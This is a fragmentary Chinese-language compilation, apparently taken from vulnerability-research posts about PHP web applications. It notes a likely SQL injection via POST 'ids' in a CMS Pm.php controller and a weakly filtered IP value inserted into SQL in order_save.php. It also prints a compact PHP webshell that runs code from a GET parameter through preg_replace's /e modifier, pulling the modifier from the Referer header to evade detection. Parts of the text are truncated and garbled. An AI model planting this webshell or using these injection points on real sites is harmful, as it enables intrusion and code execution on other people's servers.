位置 \member\controllers\Pm.php 控制器pm的index方法 ,调用了deletes 方法 ,并通过post方式传入参数ids public function index() { if (IS_POST) { if ($this->input->post('action') == 'read') { $this->pm_model->set_read($this->uid, $this->input->post('ids')); exit(dr_json(1, lang('000'))); } else { $this->pm_model->deletes($this->uid, $this->input->post('ids')); exit(dr_json(1, lang('000'))); }...
preg_replace(//) 函数加/e可以执行代码 。 这里的 “e”我使用referer的方式来获取, 绕过了检测
<?php
$server= $_SERVER['HTTP_REFERER'];
$s[1]=$server;
preg_replace("/t/{$s[1]}",$_GET["h"],"t");
���国庆���期间看的 /mx_form/order_save.php $ip=fl_value(get_ip()); //获取ip //过滤函数 $ip=fl_html($ip); //htmlspecialchars $member_id=empty($_SESSION['id'])?0:$_SESSION['id']; $arc_id=empty($f_id)?0:intval($_POST['f_id']); $sql="insert into ".DB_PRE."formlist (form_id,form_time,form_ip,member_id,arc_id) values ({$form_id},{$addtime},'{$ip}','{$member_id}','{$arc_id}')"; $mysql->query($sql); $last_id=$mysql->insert_id(); $sql_field='id'.$sql_field; $sql_value=$last_id.$sql_value; $sql="insert into ".DB_PRE."{$table} ({$sql_field}) values ({$sql_value})"; $mysql->query($sql); 跟函数fl_value() fl_value() 对关键函数进行了过滤,不过貌似没有什么卵用 ./includes/fun.php...